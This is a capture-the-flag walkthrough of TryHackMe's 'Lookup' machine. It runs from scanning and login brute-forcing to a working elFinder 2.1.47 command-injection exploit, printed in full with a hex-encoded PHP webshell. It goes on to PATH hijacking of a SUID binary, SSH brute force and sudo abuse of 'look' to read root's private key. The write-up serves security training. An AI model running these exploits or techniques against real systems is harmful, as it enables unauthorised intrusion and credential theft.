🤖Lookup

License

The following post by anthonyjsaab is licensed under CC BY 4.0

0 - Introduction

"Lookup offers a treasure trove of learning opportunities for aspiring hackers. This intriguing machine showcases various real-world vulnerabilities, ranging from web application weaknesses to privilege escalation techniques. By exploring and exploiting these vulnerabilities, hackers can sharpen their skills and gain invaluable experience in ethical hacking. Through "Lookup," hackers can master the art of reconnaissance, scanning, and enumeration to uncover hidden services and subdomains. They will learn how to exploit web application vulnerabilities, such as command injection, and understand the significance of secure coding practices. The machine also challenges hackers to automate tasks, demonstrating the power of scripting in penetration testing."

Created by tryhackme, and josemlwdf

1 - Port Scans

1a - Discovery

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -T4 -p- lookup.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 06:46 EET
Nmap scan report for lookup.thm (10.10.25.215)
Host is up (0.10s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 260.46 seconds

1b - Versioning and OS fingerprinting

┌──(kali㉿kali)-[~]
└─$ sudo nmap -A -p22,80 lookup.thm 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 06:51 EET
Nmap scan report for lookup.thm (10.10.25.215)
Host is up (0.092s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
|   256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_  256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Login Page
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   103.29 ms 10.11.0.1
2   99.73 ms  lookup.thm (10.10.25.215)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.85 seconds

1c - Vulners

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vulners --script-args mincvss=7.5 -p22,80 lookup.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 06:53 EET
Nmap scan report for lookup.thm (10.10.25.215)
Host is up (0.11s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.75 seconds

1z - What we know so far

No interesting CVEs
We have only 2 ports to investigate: 22 and 80

2 - Port 80

2a - Exploring

2b - Enumeration of lookup.thm

2bi - VHOST enum (dead-end)

┌──(kali㉿kali)-[~]
└─$ gobuster vhost -u http://lookup.thm -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt  --append-domain true --proxy http://127.0.0.1:8080 -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://lookup.thm
[+] Method:          GET
[+] Threads:         50
[+] Wordlist:        /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] Proxy:           http://127.0.0.1:8080
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Progress: 114441 / 114442 (100.00%)
===============================================================
Finished
===============================================================

2bii - Dirbusting (dead-end)

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://lookup.thm -w /usr/share/wordlists/dirb/big.txt -x php,txt,xml -t 40 --proxy http://127.0.0.1:8080 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://lookup.thm
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] Proxy:                   http://127.0.0.1:8080
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,xml
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 275]
/.htaccess.xml        (Status: 403) [Size: 275]
/.htaccess            (Status: 403) [Size: 275]
/.htpasswd.php        (Status: 403) [Size: 275]
/.htaccess.php        (Status: 403) [Size: 275]
/.htpasswd.xml        (Status: 403) [Size: 275]
/.htpasswd.txt        (Status: 403) [Size: 275]
/.htaccess.txt        (Status: 403) [Size: 275]
/index.php            (Status: 200) [Size: 719]
/login.php            (Status: 200) [Size: 1]
/server-status        (Status: 403) [Size: 275]
Progress: 81876 / 81880 (100.00%)
===============================================================
Finished

2biii - Username enumeration

Even if the login form returns a generic response when we submit random credentials, we could still find some clues if the username is correct:

As seen above, there are two specific usernames that, when used, return a different response compared to other usernames. Now the message specifies that the password is wrong, implying that 'admin' and 'jose' are valid usernames.

2biv - Password bruteforcing

Since admin is the more interesting username, we are going to bruteforce the password associated with admin:

A password X stands out. Even though we got the initial error, this password in particular did return a different response than the other attempts.

Since the attempt failed with admin, we will try it with jose:

We now have valid credentials! However, attempting to login to SSH using these credentials will fail. We will stick with HTTP for now. The successful attempt in HTTP sends us to another VHOST. It seems that the absence of a valid cookie was the reason why we did not detect the 'files.lookup.thm' VHOST earlier.

2c - files.lookup.thm: Jackpot?

When logging in successfully in lookup.thm using the browser, we are redirected to this page:

All of these files have credentials in them. None of them are useful when bruteforcing SSH. These files are completely useless.

2d - Exploit & Foothold

Examining the source code, we can locate many instances were elFinder is mentioned. A comment even includes a link to its GitHub repo:

It turns out this file manager for Web is quite popular! With around 7K commits and 5K stars, maybe some exploit is out there?

┌──(kali㉿kali)-[~]
└─$ searchsploit elfinder
---------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                              |  Path
---------------------------------------------------------------------------- ---------------------------------
elFinder 2 - Remote Command Execution (via File Creation)                   | php/webapps/36925.py
elFinder 2.1.47 - 'PHP connector' Command Injection                         | php/webapps/46481.py
elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit) | php/remote/46539.rb
elFinder Web file manager Version - 2.1.53 Remote Command Execution         | php/webapps/51864.txt
---------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

We will try the 46481.py exploit. However, we need to tweak it. The Python script should include in the HTTP requests it sends the cookie obtained after a successful login to lookup.thm. The changes are on lines 26, 27, 40, 46, 51, 58

┌──(kali㉿kali)-[~]
└─$ cat 46481.py                                           
#!/usr/bin/python

'''
# Exploit Title: elFinder <= 2.1.47 - Command Injection vulnerability in the PHP connector.
# Date: 26/02/2019
# Exploit Author: @q3rv0
# Vulnerability reported by: Thomas Chauchefoin
# Google Dork: intitle:"elFinder 2.1.x"
# Vendor Homepage: https://studio-42.github.io/elFinder/
# Software Link: https://github.com/Studio-42/elFinder/archive/2.1.47.tar.gz
# Version: <= 2.1.47
# Tested on: Linux 64bit + Python2.7
# PoC: https://www.secsignal.org/news/cve-2019-9194-triggering-and-exploiting-a-1-day-vulnerability/
# CVE: CVE-2019-9194

# Usage: python exploit.py [URL]

'''

import requests
import json
import sys

headers = {"Host" : "files.lookup.thm"}
cookies = {"REDACTED" : "REDACTED"}
payload = 'SecSignal.jpg;echo 3c3f7068702073797374656d28245f4745545b2263225d293b203f3e0a | xxd -r -p > SecSignal.php;echo SecSignal.jpg'


def usage():
    if len(sys.argv) != 2:
        print "Usage: python exploit.py [URL]"
        sys.exit(0)


def upload(url, payload):
    files = {'upload[]': (payload, open('SecSignal.jpg', 'rb'))}
    data = {"reqid" : "1693222c439f4", "cmd" : "upload", "target" : "l1_Lw", "mtime[]" : "1497726174"}
    r = requests.post("%s/php/connector.minimal.php" % url, files=files, data=data, headers=headers, cookies=cookies)
    j = json.loads(r.text)
    return j['added'][0]['hash']
    

def imgRotate(url, hash):
    r = requests.get("%s/php/connector.minimal.php?target=%s&width=539&height=960&degree=180&quality=100&bg=&mode=rotate&cmd=resize&reqid=169323550af10c" % (url, hash), headers=headers, cookies=cookies)
    return r.text


def shell(url):
    r = requests.get("%s/php/SecSignal.php" % url, headers=headers, cookies=cookies)
    if r.status_code == 200:
       print "[+] Pwned! :)"
       print "[+] Getting the shell..."
       while 1:
           try:
               input = raw_input("$ ")
               r = requests.get("%s/php/SecSignal.php?c=%s" % (url, input), headers=headers, cookies=cookies)
               print r.text
           except KeyboardInterrupt:
               sys.exit("\nBye kaker!")
    else:
        print "[*] The site seems not to be vulnerable :("

--SNIP--

Running the above tweaked exploit gives us foothold! :

┌──(kali㉿kali)-[~]
└─$ cp ~/Pictures/Samples/sample1.JPG SecSignal.jpg
                                                                                                                        
┌──(kali㉿kali)-[~]
└─$ python2 46481.py http://files.lookup.thm/elFinder
[*] Uploading the malicious image...
[*] Running the payload...
[+] Pwned! :)
[+] Getting the shell...
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

3 - Horizontal PrivEsc

3a - LinPEAS

We run LinPEAS on the target machine. In the output of LinPEAS, we can find the following:

-rwsr-sr-x 1 root root 17K Jan 11 2024 /usr/sbin/pwm (Unknown SUID binary!)

pwm is owned by root and has the SUID and SGID bits set! Running the mentioned binary gives the following output:

www-data@lookup:/var$ /usr/sbin/pwm
/usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: www-data
[-] File /home/www-data/.passwords not found

Exfiltrating this binary to my Kali for further analysis:

┌──(kali㉿kali)-[~]
└─$ ltrace ./pwm   
puts("[!] Running 'id' command to extr"...[!] Running 'id' command to extract the username and user ID (UID)
)                                           = 67
snprintf("id", 100, "id")                                                             = 2
popen("id", "r")                                                                      = 0x55a711e836b0
__isoc99_fscanf(0x55a711e836b0, 0x55a6d9e33070, 0x7ffdaf89db60, 8)                    = 1
printf("[!] ID: %s\n", "kali" <no return ...>
--- SIGCHLD (Child exited) ---
[!] ID: kali
<... printf resumed> )                                                                = 13
pclose(0x55a711e836b0)                                                                = 0
snprintf("/home/kali/.passwords", 100, "/home/%s/.passwords", "kali")                 = 21
fopen("/home/kali/.passwords", "r")                                                   = 0x55a711e838d0
fgetc(0x55a711e838d0)                                                                 = 'h'
--SNIP--

From the above output, we can see that the pwm binary prints the contents of /home/%s/.passwords, where %s is the output of the call to id . It happens that the user think does have this file, and we cannot read it using www-data:

www-data@lookup:/var$ ls -la /home/think/.passwords
ls -la /home/think/.passwords
-rw-r----- 1 root think 525 Jul 30  2023 /home/think/.passwords

We can also see from the ltrace output that the program tries to invoke id without specifying the absolute path (lines 5 & 6). We can abuse this ambiguity.

3b - Abusing SUID - Going for think's passwords

We write an executable that gives the same output as id when being run by think:

www-data@lookup:/var$ id think
id think
uid=1000(think) gid=1000(think) groups=1000(think)
www-data@lookup:/tmp$ cat id
cat id
#!/bin/bash
echo 'uid=1000(think) gid=1000(think) groups=1000(think)'

www-data@lookup:/tmp$ chmod +x id
chmod +x id
www-data@lookup:/tmp$ ./id
./id
uid=1000(think) gid=1000(think) groups=1000(think)
www-data@lookup:/tmp$ which id
which id
/usr/bin/id
www-data@lookup:/tmp$ PATH=.:$PATH
PATH=.:$PATH
www-data@lookup:/tmp$ which id
which id
./id

All is set up correctly. Moment of truth!

www-data@lookup:/tmp$ /usr/sbin/pwm
/usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: think
jose1006
jose1004
jose1002
jose1001teles
jose100190
jose10001
jose10.asd
jose10+
jose0_07
jose0990
jose0986$
jose098130443
jose0981
jose0924
jose0923
jose0921
thepassword
jose(1993)
jose'sbabygurl
jose&vane
jose&takie
jose&samantha
jose&pam
jose&jlo
jose&jessica
jose&jessi
josemario.AKA(think)
jose.medina.
jose.mar
jose.luis.24.oct
jose.line
jose.leonardo100
jose.leas.30
jose.ivan
jose.i22
jose.hm
jose.hater
jose.fa
jose.f
jose.dont
jose.d
jose.com}
jose.com
jose.chepe_06
jose.a91
jose.a
jose.96.
jose.9298
jose.2856171

3c - Bruteforcing SSH

In the previous part, we effectively got a wordlist. We will use it to try and login to SSH using think as a username:

┌──(kali㉿kali)-[~]
└─$ hydra -vV -l think -P /home/kali/think_passwords.txt -t 4 -I ssh://lookup.thm
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-24 19:30:16
[DATA] max 4 tasks per 1 server, overall 4 tasks, 49 login tries (l:1/p:49), ~13 tries per task
[DATA] attacking ssh://lookup.thm:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://[email protected]:22
[INFO] Successful, password authentication is supported by ssh://10.10.125.133:22
[ATTEMPT] target lookup.thm - login "think" - pass "jose1006" - 1 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose1004" - 2 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose1002" - 3 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose1001teles" - 4 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose100190" - 5 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose10001" - 6 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose10.asd" - 7 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose10+" - 8 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0_07" - 9 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0990" - 10 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0986$" - 11 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose098130443" - 12 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0981" - 13 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0924" - 14 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0923" - 15 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0921" - 16 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "thepassword" - 17 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose(1993)" - 18 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose'sbabygurl" - 19 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&vane" - 20 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&takie" - 21 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&samantha" - 22 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&pam" - 23 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&jlo" - 24 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&jessica" - 25 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&jessi" - 26 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "josemario.AKA(think)" - 27 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose.medina." - 28 of 49 [child 3] (0/0)
[22][ssh] host: lookup.thm   login: think   password: REDACTED!!
[STATUS] attack finished for lookup.thm (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-24 19:30:42

We got the password!

┌──(kali㉿kali)-[~]
└─$ ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 24 Nov 2024 05:31:32 PM UTC

  System load:  0.0               Processes:             141
  Usage of /:   59.7% of 9.75GB   Users logged in:       0
  Memory usage: 25%               IPv4 address for ens5: 10.10.125.133
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

7 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sun May 12 12:07:25 2024 from 192.168.14.1
think@lookup:~$ cat user.txt
REDACTED!!

4 - Vertical PrivEsc

Right off the bat, the first try at manual enum got me this:

think@lookup:~$ sudo -l
[sudo] password for think: 
Matching Defaults entries for think on lookup:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User think may run the following commands on lookup:
    (ALL) /usr/bin/look

I also got lucky on how to use look :

think@lookup:~$ sudo look '' "/root/.ssh/id_rsa"
-----BEGIN OPENSSH PRIVATE KEY-----
--SNIP--
-----END OPENSSH PRIVATE KEY-----

We will save the private key of root@lookup to my kali in a file named root. We adjust its permission, and login to SSH using it:

┌──(kali㉿kali)-[~]
└─$ nano root
                                                                                                                                     
┌──(kali㉿kali)-[~]
└─$ chmod 600 root                              
                                                                                                                                     
┌──(kali㉿kali)-[~]
└─$ ssh -i root [email protected]
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 24 Nov 2024 05:59:10 PM UTC

  System load:  0.0               Processes:             147
  Usage of /:   59.7% of 9.75GB   Users logged in:       1
  Memory usage: 25%               IPv4 address for ens5: 10.10.125.133
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

7 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon May 13 10:00:24 2024 from 192.168.14.1
root@lookup:~# cat root.txt 
REDACTED!!

PreviousInclude NextmKingdom

Last updated 1 year ago

hashtag0 - Introduction

hashtag1 - Port Scans

hashtag1a - Discovery

hashtag1b - Versioning and OS fingerprinting

hashtag1c - Vulners

hashtag1z - What we know so far

hashtag2 - Port 80

hashtag2a - Exploring

hashtag2b - Enumeration of lookup.thm

hashtag2bi - VHOST enum (dead-end)

hashtag2bii - Dirbusting (dead-end)

hashtag2biii - Username enumeration

hashtag2biv - Password bruteforcing

hashtag2c - files.lookup.thm: Jackpot?

hashtag2d - Exploit & Foothold

hashtag3 - Horizontal PrivEsc

hashtag3a - LinPEAS

hashtag3b - Abusing SUID - Going for think's passwords

hashtag3c - Bruteforcing SSH

hashtag4 - Vertical PrivEsc